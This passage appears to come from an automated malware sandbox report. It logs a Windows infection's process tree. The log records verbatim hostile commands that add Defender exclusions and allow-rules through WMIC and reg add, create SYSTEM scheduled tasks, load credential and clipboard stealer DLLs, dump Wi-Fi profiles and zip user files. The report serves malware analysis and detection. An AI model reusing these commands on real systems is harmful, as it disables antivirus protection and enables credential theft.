        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6964
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:7104
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3652
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 02:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSFD1D.tmp\Install.exe\" it /wLadidXOHM 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:6912
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:6168
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:6032
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:5948
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        6⤵
        
        PID:5388
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5816
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5880
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5888
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5896
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:5732
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:5560
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:5588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\726321484195_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6016
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1612
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        
        PID:5244
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        Executes dropped EXE
        
        PID:5880
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        Executes dropped EXE
        
        PID:1020
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 332
        6⤵
        Program crash
        
        PID:5444
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:1896
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        
        PID:856
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:5368
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:6228
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        
        PID:6260
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        
        PID:6420
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        
        PID:6528
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:6968
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:228
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        
        PID:6820
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:3120
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        
        PID:5316
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        
        PID:116
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        
        PID:6012
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2504
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:5384
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:2496
- - C:\Users\Admin\AppData\Local\Temp\1000020001\cd0a04cbf6.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\cd0a04cbf6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:1688
- - C:\Users\Admin\1000021002\76c1f15004.exe
    "C:\Users\Admin\1000021002\76c1f15004.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4528
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fb32cc40,0x7ff9fb32cc4c,0x7ff9fb32cc58
        5⤵
        
        PID:1176
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,3074136352822323678,14010416225516855263,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1944 /prefetch:2
        5⤵
        
        PID:3136
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2180,i,3074136352822323678,14010416225516855263,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2192 /prefetch:3
        5⤵
        
        PID:3904
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,3074136352822323678,14010416225516855263,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2496 /prefetch:8
        5⤵
        
        PID:928
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,3074136352822323678,14010416225516855263,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3172 /prefetch:1
        5⤵
        
        PID:2488
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,3074136352822323678,14010416225516855263,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3436 /prefetch:1
        5⤵
        
        PID:4856
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,3074136352822323678,14010416225516855263,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4556 /prefetch:8
        5⤵
        
        PID:1684
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4744,i,3074136352822323678,14010416225516855263,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4756 /prefetch:8
        5⤵
        
        PID:3924
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2192,i,3074136352822323678,14010416225516855263,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4828 /prefetch:3
        5⤵
        
        PID:6452

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2968 -ip 2968
1⤵
PID:2940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1612 -ip 1612
1⤵
PID:3428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6076 -ip 6076
1⤵
PID:2872

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6096

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2632

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:6552
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:6648
- - C:\Windows\Temp\306354.exe
    "C:\Windows\Temp\306354.exe" --list-devices
    3⤵
    PID:6676

C:\Users\Admin\AppData\Local\Temp\7zSEACD.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSEACD.tmp\Install.exe it /iYvdidvYGa 385118 /S
1⤵
PID:748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:452
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5584
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6692
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6032
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:1304
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4236
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3096
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:2256
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4088
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5672
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6936
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:3120
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:6740
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3656
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 2112 -ip 2112
1⤵
PID:6680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:7044

C:\Users\Admin\AppData\Local\Temp\7zSFD1D.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSFD1D.tmp\Install.exe it /wLadidXOHM 385118 /S
1⤵
PID:5384
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:864
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4308
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4940
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6848
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2708
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6820
- - C:\Windows\SysWOW64\forfiles.exe
